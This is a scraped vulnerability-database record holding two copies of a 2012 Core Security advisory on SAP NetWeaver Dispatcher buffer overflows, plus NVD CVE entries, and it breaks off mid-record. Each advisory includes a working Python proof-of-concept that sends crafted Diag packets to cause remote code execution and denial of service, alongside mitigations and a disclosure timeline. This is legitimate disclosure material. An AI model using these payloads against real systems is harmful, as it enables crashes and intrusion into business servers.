"2012-05-09T00:00:00", "title": "SAP NetWeaver Dispatcher - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2514", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-05-09T00:00:00", "id": "EXPLOITPACK:38C9271832F7D463B695A8339E8E1E4C", "href": "", "sourceData": "Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nSAP Netweaver Dispatcher Multiple Vulnerabilities\n\n\n1. *Advisory Information*\n\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL:\nhttp://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-08\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n\n2. *Vulnerability Information*\n\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2011-1516, CVE-2011-1517, CVE-2012-2511, CVE-2012-2512,\nCVE-2012-2513, CVE-2012-2514\n\n\n3. *Vulnerability Description*\n\nSAP Netweaver [1] is a technology platform for building and integrating\nSAP business applications. Multiple vulnerabilities have been found in\nSAP Netweaver that could allow an unauthenticated, remote attacker to\nexecute arbitrary code and lead to denial of service conditions. The\nvulnerabilities are triggered sending specially crafted SAP Diag packets\nto remote TCP port 32NN (being NN the SAP system number) of a host\nrunning the \"Dispatcher\" service, part of SAP Netweaver Application\nServer ABAP. By sending different messages, the different\nvulnerabilities can be triggered.\n\n\n4. *Vulnerable packages*\n\n . SAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\n . SAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\n . Older versions are probably affected too, but they were not checked.\n\n\n5. *Non-vulnerable packages*\n\n . Vendor did not provide this information.\n\n\n6. *Vendor Information, Solutions and Workarounds*\n\nSAP released the security note\nhttps://service.sap.com/sap/support/notes/1687910 regarding these\nissues. Contact SAP for further information.\n\nMartin Gallo proposed the following actions to mitigate the impact of\nthe vulnerabilities:\n\n 1. Disable work processes' Developer Traces for the 'Dialog\nProcessing' component (for the vulnerabilities [CVE-2011-1516],\n[CVE-2011-1517], [CVE-2012-2511] and [CVE-2012-2512]).\n 2. Restrict access to the Dispatcher service's TCP ports (3200/3299)\n(for all vulnerabilities).\n 3. Restrict access to the work process management transactions\nSM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the\nvulnerabilities [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511] and\n[CVE-2012-2512]).\n\n\n7. *Credits*\n\nThese vulnerabilities were discovered and researched by Martin Gallo\nfrom\nhttp://www.coresecurity.com/content/services-overview-core-security-consulting-services.\nThe publication of this advisory was coordinated by Fernando Miranda\nfrom http://www.coresecurity.com/content/corelabs-advisories .\n\n\n8. *Technical Description / Proof of Concept Code*\n\n*NOTE:* (The tracing of 'Dialog processing' has to be in level 2 or 3 in\norder to exploit flaws [CVE-2011-1516], [CVE-2011-1517], [CVE-2012-2511]\nand [CVE-2012-2512]).\n\nThe following python script can be used to reproduce the vulnerabilities\ndescribed below:\n\n/-----\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\",\ndefault=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port\nnumber\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n packet = struct.pack(\"!I\", len(packet)) + packet\n sock.send(packet)\n\ndef receive(sock):\n length = sock.recv(4)\n (length, ) = struct.unpack(\"!I\", length)\n data = \"\"\n while len(data)<length:\n data+= sock.recv(length)\n return (length, data)\n\ndef initialize(sock):\n diagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n user_connect =\n\"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n support_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n support_data+=\n\"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n support_data+=\n\"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n dpheader =\n\"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n dpheader+= struct.pack(\"I\", len(diagheader + user_connect +\nsupport_data))\n dpheader+=\n\"\\x00\\xff\\xff\\xff\\xff\\xff\\xff \"\n dpheader+= \"terminalXXXXXXX\"\n dpheader+=\n\"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00 \n\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n send_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n diagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n step = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n eom = \"\\x0c\"\n send_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection) \n\n-----/\n In the following subsections, we give the python code that can be added\nafter the script above in order to reproduce all vulnerabilities.\n\n\n8.1. *SAP Netweaver DiagTraceR3Info Vulnerability*\n\n[CVE-2011-1516] The vulnerability can be triggered when SAP Netweaver\n'disp+work.exe' module process a specially crafted network packet.\nMalicious packets are processed by the vulnerable function\n'DiagTraceR3Info' in the 'disp+work.exe' module when the Developer Trace\nis configured at levels 2 or 3 for the \"Dialog processor\" component of\nthe \"Dialog\" work process handling the packet [2]. This vulnerability\ncould allow a remote unauthenticated attacker to execute arbitrary code\nwith the privileges of the user running the \"Dispatcher\" service. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n-----/\n\n\n\n8.2. *SAP Netweaver DiagTraceHex Denial of Service Vulnerability*\n\n[CVE-2011-1517] The vulnerability can be triggered by sending a\nspecially crafted network packet to the vulnerable function\n'DiagTraceHex' in the 'disp+work.exe'. This vulnerability could allow a\nremote unauthenticated attacker to conduct a denial of service attack\nagainst the vulnerable systems. The following python code can be used to\ntrigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.3. *SAP Netweaver DiagTraceAtoms Denial of Service Vulnerability*\n\n[CVE-2012-2511] The vulnerability can be triggered by sending a\nspecially crafted network packet to the vulnerable function\n'DiagTraceAtoms'. This vulnerability could allow a remote\nunauthenticated attacker to conduct a denial of service attack. The\nfollowing python code can be used to trigger the vulnerability:\n\n/-----\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n-----/\n\n\n\n8.4. *SAP Netweaver DiagTraceStreamI Denial of Service Vulnerability*\n\n[CVE-2012-2512] The vulnerability can be triggered by sending a\nspecially crafted network packet to the vulnerable function\n'DiagTraceStreamI' and could allow a remote unauthenticated attacker to\nconduct a denial of service attack.\n\n/-----\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n-----/\n\n\n\n8.5. *SAP Netweaver Diaginput Denial of Service Vulnerability*\n\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable\nfunction 'Diaginput', allowing a denial of service attack against the\nvulnerable systems.\n\n/-----\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n-----/\n\n\n\n8.6. *SAP Netweaver DiagiEventSource Denial of Service Vulnerability*\n\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable\nfunction 'DiagiEventSource' in the 'disp+work.exe' module. This\nvulnerability could allow a remote unauthenticated attacker to conduct a\ndenial of service attack.\n\n/-----\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n-----/\n\n\n\n9. *Report Timeline*\n\n. 2012-01-24:\nCore Security Technologies notifies the SAP team of the vulnerability,\nsetting the estimated publication date of the advisory for February\n21st, 2012.\n\n. 2012-01-24:\nCore sends an advisory draft with technical details.\n\n. 2012-01-24:\nThe SAP team confirms the reception of the issue and asks to use the\nsecurity ID 582820-2012 for further communication. SAP also notifies its\nterms and conditions [3], and asks for Core to commit to that guideline.\n\n. 2012-02-01:\nThe Core Advisories Team communicates that it has its own guidelines for\nthe advisories publication process, which may conflict with SAP's\nguidelines. In particular, Core does not guarantee that the publication\nof the advisory will be postponed until a fix or patch is made available\nby SAP. If information about this vulnerability is partially or\ncompletely leaked by a third party, the advisory would be released\nimmediately as forced release. Despite this, the Core team commits to\ncomply with SAP's guidelines as much as possible.\n\n. 2012-02-21:\nFirst release date missed.\n\n. 2012-02-22:\nCore asks for the status of the fix and notifies that the release date\nwas missed.\n\n. 2012-02-23:\nSAP notifies that, because the development team has to downport the\nsolutions for a huge bunch of software releases, the earliest release\ndate for the patches would be May 8th 2012.\n\n. 2012-02-23:\nCore re-schedules the advisory publication to May 8th.\n\n. 2012-04-16:\nCore asks if the patching process is still on track to release patches\non May 8th and requests a status of the fix.\n\n. 2012-04-16:\nVendor notifies that the release date is still planned for May 8th, but\ndue to quality control processes this date cannot be guaranteed.\n\n. 2012-05-04:\nCore notifies that everything is ready for publication and requests the\nvendor to confirm the release date and the list of affected platforms\n(no reply received).\n\n. 2012-05-07:\nCore asks again for the status of the fix.\n\n. 2012-05-08:\nSAP notifies that they have released the security note 1687910 [4] on\nMay Patch Day 2012 and asks to include that information in [Sec. 6]. SAP\nalso requests Core to remove all the technical information researched by\nMartin Gallo in [Sec. 8].\n\n. 2012-05-08:\nCore replies that the reporting of vulnerabilities is aimed at helping\nvulnerable users to understand and address the issues; the advisory will\nthus be released with the technical information.\n\n. 2012-05-08:\nAdvisory CORE-2012-0123 published.\n\n\n\n10. *References*\n\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2]\nhttp://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP's legal information, terms and conditions\nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46.\n\n[4] SAP security note 1687910\nhttps://service.sap.com/sap/support/notes/1687910.\n\n\n11. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\nhttp://corelabs.coresecurity.com.\n\n\n12. *About Core Security Technologies*\n\nCore Security Technologies enables organizations to get ahead of threats\nwith security test and measurement solutions that continuously identify\nand demonstrate real-world exposures to their most critical assets. Our\ncustomers can gain real visibility into their security standing, real\nvalidation of their security controls, and real metrics to more\neffectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted\nresearch and leading-edge threat expertise from the company's Security\nConsulting Services, CoreLabs and Engineering groups. Core Security\nTechnologies can be reached at +1 (617) 399-6980 or on the Web at:\nhttp://www.coresecurity.com.\n\n\n13. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2012 Core Security\nTechnologies and (c) 2012 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n14. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\nhttp://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T19:04:46", "description": "\nSAP NetWeaver Dispatcher 7.0 ehp12 - Multiple Vulnerabilities", "edition": 1, "published": "2012-08-21T00:00:00", "title": "SAP NetWeaver Dispatcher 7.0 ehp12 - Multiple Vulnerabilities", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1516", "CVE-2011-1517", "CVE-2012-2611", "CVE-2012-2514", "CVE-2012-2612", "CVE-2012-2512", "CVE-2012-2513", "CVE-2012-2511"], "modified": "2012-08-21T00:00:00", "id": "EXPLOITPACK:5E02FE625A985E79A644BA6E4CB62E2F", "href": "", "sourceData": "1. Advisory Information\nTitle: SAP Netweaver Dispatcher Multiple Vulnerabilities\nAdvisory ID: CORE-2012-0123\nAdvisory URL: http://www.coresecurity.com/content/sap-netweaver-dispatcher-multiple-vulnerabilities\nDate published: 2012-05-08\nDate of last update: 2012-05-10\nVendors contacted: SAP\nRelease mode: Coordinated release\n\n2. Vulnerability Information\nClass: Buffer overflow [CWE-119]\nImpact: Code execution, Denial of service\nRemotely Exploitable: Yes\nLocally Exploitable: No\nCVE Name: CVE-2012-2611, CVE-2012-2612, CVE-2012-2511, CVE-2012-2512, CVE-2012-2513, CVE-2012-2514\n\n3. Vulnerability Description\nSAP Netweaver [1] is a technology platform for building and integrating SAP business applications. Multiple vulnerabilities have been found in SAP Netweaver that could allow an unauthenticated, remote attacker to execute arbitrary code and lead to denial of service conditions. The vulnerabilities are triggered sending specially crafted SAP Diag packets to remote TCP port 32NN (being NN the SAP system number) of a host running the \"Dispatcher\" service, part of SAP Netweaver Application Server ABAP. By sending different messages, the different vulnerabilities can be triggered.\n\n4. Vulnerable packages\nSAP Netweaver 7.0 EHP1 (disp+work.exe version v7010.29.15.58313).\nSAP Netweaver 7.0 EHP2 (disp+work.exe version v7200.70.18.23869).\nOlder versions are probably affected too, but they were not checked.\n5. Non-vulnerable packages\nVendor did not provide this information.\n6. Vendor Information, Solutions and Workarounds\nSAP released the security note 1687910 regarding these issues. Contact SAP for further information.\n\nMartin Gallo proposed the following actions to mitigate the impact of the vulnerabilities:\n\nDisable work processes' Developer Traces for the 'Dialog Processing' component (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\nRestrict access to the Dispatcher service's TCP ports (3200/3299) (for all vulnerabilities).\nRestrict access to the work process management transactions SM04/SM50/SM66 and profile maintenance RZ10/RZ20 (for the vulnerabilities [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\n7. Credits\nThese vulnerabilities were discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Security Advisories Team .\n\n8. Technical Description / Proof of Concept Code\nNOTE: (The tracing of 'Dialog processing' has to be in level 2 or 3 in order to exploit flaws [CVE-2012-2611], [CVE-2012-2612], [CVE-2012-2511] and [CVE-2012-2512]).\n\nThe following python script can be used to reproduce the vulnerabilities described below:\n\nimport socket, struct\nfrom optparse import OptionParser\n\n# Parse the target options\nparser = OptionParser()\nparser.add_option(\"-l\", \"--hostname\", dest=\"hostname\", help=\"Hostname\", default=\"localhost\")\nparser.add_option(\"-p\", \"--port\", dest=\"port\", type=\"int\", help=\"Port number\", default=3200)\n(options, args) = parser.parse_args()\n\ndef send_packet(sock, packet):\n\tpacket = struct.pack(\"!I\", len(packet)) + packet\n\tsock.send(packet)\n\ndef receive(sock):\n\tlength = sock.recv(4)\n\t(length, ) = struct.unpack(\"!I\", length)\n\tdata = \"\"\n\twhile len(data)<length:\n\t\tdata+= sock.recv(length)\n\treturn (length, data)\n\ndef initialize(sock):\n\tdiagheader = \"\\x00\\x10\\x00\\x00\\x00\\x00\\x00\\x00\"\n\tuser_connect = \"\\x10\\x04\\x02\\x00\\x0c\\x00\\x00\\x00\\xc8\\x00\\x00\\x04\\x4c\\x00\\x00\\x0b\\xb8\"\n\tsupport_data = \"\\x10\\x04\\x0b\\x00\\x20\"\n\tsupport_data+= \"\\xff\\x7f\\xfa\\x0d\\x78\\xb7\\x37\\xde\\xf6\\x19\\x6e\\x93\\x25\\xbf\\x15\\x93\"\n\tsupport_data+= \"\\xef\\x73\\xfe\\xeb\\xdb\\x51\\xed\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\tdpheader = \"\\xff\\xff\\xff\\xff\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\\xff\"\n\tdpheader+= struct.pack(\"I\", len(diagheader + user_connect + support_data))\n\tdpheader+= \"\\x00\\xff\\xff\\xff\\xff\\xff\\xff\"\n\tdpheader+= \"terminalXXXXXXX\"\n\tdpheader+= \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\x01\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\tsend_packet(sock, dpheader + diagheader + user_connect + support_data)\n\ndef send_message(sock, message):\n\tdiagheader = \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\"\n\tstep = \"\\x10\\x04\\x26\\x00\\x04\\x00\\x00\\x00\\x01\"\n\teom = \"\\x0c\"\n\tsend_packet(sock, diagheader + step + message + eom)\n\n# Connect and send initialization packet\nconnection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\nconnection.connect((options.hostname, options.port))\ninitialize(connection)\nreceive(connection)\n\n# Choose one of the following and comment the others\n\n#[CVE-2012-2611] \ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n\n#[CVE-2012-2612] \ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n\n#[CVE-2012-2511]\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n\n#[CVE-2012-2512] \ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n\n#[CVE-2012-2513]\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n\n#[CVE-2012-2514]\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n\nIn the following subsections, we give the python code that can be added after the script above in order to reproduce all vulnerabilities.\n\n8.1. SAP Netweaver DiagTraceR3Info Vulnerability\n[CVE-2012-2611] The vulnerability can be triggered when SAP Netweaver disp+work.exe module process a specially crafted network packet. Malicious packets are processed by the vulnerable function DiagTraceR3Info in the disp+work.exe module when the Developer Trace is configured at levels 2 or 3 for the \"Dialog processor\" component of the \"Dialog\" work process handling the packet [2]. This vulnerability could allow a remote unauthenticated attacker to execute arbitrary code with the privileges of the user running the \"Dispatcher\" service. The following python code can be used to trigger the vulnerability:\n\n\ncrash = \"X\"*114 + \"\\xff\\xff\" # --> Unicode Address to call !\ncrash+= \"Y\"*32\ncrash = \"\\x10\\x06\\x20\" + struct.pack(\"!H\", len(crash)) + crash\nsend_message(connection, crash)\n\n8.2. SAP Netweaver DiagTraceHex Denial Of Service Vulnerability\n[CVE-2012-2612] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceHex in the disp+work.exe. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack against the vulnerable systems. The following python code can be used to trigger the vulnerability:\n\n\ncrash = \"\\x12\\x04\\x18\\xff\\xff\\xff\\xffCrash!\"\nsend_message(connection, crash)\n\n8.3. SAP Netweaver DiagTraceAtoms Denial Of Service Vulnerability\n[CVE-2012-2511] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceAtoms. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack. The following python code can be used to trigger the vulnerability:\n\n\ncrash = \"\\x12\\x09\\x02\\x00\\x00\\x00\\x08\" + \"\\x80\"*8\nsend_message(connection, crash)\n\n8.4. SAP Netweaver DiagTraceStreamI Denial Of Service Vulnerability\n[CVE-2012-2512] The vulnerability can be triggered by sending a specially crafted network packet to the vulnerable function DiagTraceStreamI and could allow a remote unauthenticated attacker to conduct a denial of service attack.\n\n\ncrash = \"\\x10\\x13\\x09\\x00\\xFF\\x12\\x1A\\x59\\x51\"\nsend_message(connection, crash)\n\n8.5. SAP Netweaver Diaginput Denial Of Service Vulnerability\n[CVE-2012-2513] The vulnerability can be triggered by the vulnerable function Diaginput, allowing a denial of service attack against the vulnerable systems.\n\n\ncrash = \"\\x10\\x0c\\x0e\\x00\\0a\" + \"A\"*10\nsend_message(connection, crash)\n\n8.6. SAP Netweaver DiagiEventSource Denial Of Service Vulnerability\n[CVE-2012-2514] The vulnerability can be triggered by the vulnerable function DiagiEventSource in the disp+work.exe module. This vulnerability could allow a remote unauthenticated attacker to conduct a denial of service attack.\n\n\ncrash = \"\\x10\\x0f\\x01\\x00\\x11\" + \"A\"*17\nsend_message(connection, crash)\n\n9. Report Timeline\n2012-01-24: Core Security Technologies notifies the SAP team of the vulnerability, setting the estimated publication date of the advisory for February 21st, 2012.\n2012-01-24: Core sends an advisory draft with technical details.\n2012-01-24: The SAP team confirms the reception of the issue and asks to use the security ID 582820-2012 for further communication. SAP also notifies its terms and conditions [3], and asks for Core to commit to that guideline.\n2012-02-01: The Core Advisories Team communicates that it has its own guidelines for the advisories publication process, which may conflict with SAP's guidelines. In particular, Core does not guarantee that the publication of the advisory will be postponed until a fix or patch is made available by SAP. If information about this vulnerability is partially or completely leaked by a third party, the advisory would be released immediately as forced release. Despite this, the Core team commits to comply with SAP's guidelines as much as possible.\n2012-02-21: First release date missed.\n2012-02-22: Core asks for the status of the fix and notifies that the release date was missed.\n2012-02-23: SAP notifies that, because the development team has to downport the solutions for a huge bunch of software releases, the earliest release date for the patches would be May 8th 2012.\n2012-02-23: Core re-schedules the advisory publication to May 8th.\n2012-04-16: Core asks if the patching process is still on track to release patches on May 8th and requests a status of the fix.\n2012-04-16: Vendor notifies that the release date is still planned for May 8th, but due to quality control processes this date cannot be guaranteed.\n2012-05-04: Core notifies that everything is ready for publication and requests the vendor to confirm the release date and the list of affected platforms (no reply received).\n2012-05-07: Core asks again for the status of the fix.\n2012-05-08: SAP notifies that they have released the security note 1687910 [4] on May Patch Day 2012 and asks to include that information in [Sec. 6]. SAP also requests Core to remove all the technical information researched by Martin Gallo in [Sec. 8].\n2012-05-08: Core replies that the reporting of vulnerabilities is aimed at helping vulnerable users to understand and address the issues; the advisory will thus be released with the technical information.\n2012-05-08: Advisory CORE-2012-0123 published.\n2012-05-10: ERRATA: CVE-2011-1516 changed to CVE-2012-2611. CVE-2011-1517 changed to CVE-2012-2612.\n10. References\n[1] http://www.sap.com/platform/netweaver/index.epx\n[2] http://help.sap.com/saphelp_nw70ehp2/helpdata/en/47/cc212b3fa5296fe10000000a42189b/frameset.htm\n[3] SAP's legal information, terms and conditions \nhttp://www.sdn.sap.com/irj/sdn/security?rid=/webcontent/uuid/c05604f6-4eb3-2d10-eea7-ceb666083a6a#section46. \n[4] SAP security note 1687910 \nhttps://service.sap.com/sap/support/notes/1687910. \n\n11. About CoreLabs\nCoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.\n\n12. About Core Security Technologies\nCore Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.\n\nCore Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.\n\n13. Disclaimer\nThe contents of this advisory are copyright (c) 2012 Core Security Technologies and (c) 2012 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n14. PGP/GPG Keys\nThis advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2020-10-03T12:06:04", "description": "The DiagiEventSource function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", "edition": 3, "cvss3": {}, "published": "2012-05-15T04:21:00", "title": "CVE-2012-2514", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2514"], "modified": "2017-12-06T02:29:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2012-2514", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2514", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T12:06:04", "description": "The DiagTraceStreamI function in disp+work.exe 7010.29.15.58313 and 7200.70.18.23869 in the Dispatcher in SAP NetWeaver 7.0 EHP1 and EHP2 allows remote attackers to cause a denial of service (daemon crash) via a crafted SAP Diag packet.", "edition": 3, "cvss3": {}, "published": "2012-05-15T04:21:00", "title": "CVE-2012-2512", "type": "cve", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-2512"], "modified": "2017-08-29T01:31:00", "cpe": ["cpe:/a:sap:netweaver:7.0"], "id": "CVE-2012-2512", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2512", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:sap:netweaver:7.0:ehp2:*:*:*:*:*:*", "cpe:2.3:a:sap:netweaver:7.0:ehp1:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:39:26", "description": "The kSBXProfileNoNetwork and kSBXProfileNoInternet sandbox profiles in Apple Mac OS X 10.5.x through 10.7.x do not propagate restrictions to all created processes, which allows remote attackers to access network resources via a crafted application, as demonstrated by use of osascript to send Apple events to the launchd daemon, a related issue to CVE-2008-7303.", "edition": 3, "cvss3": {}, "published": "2011-11-15T18:55:00", "title": "CVE-2011-1516", "type": "cve", "cwe": 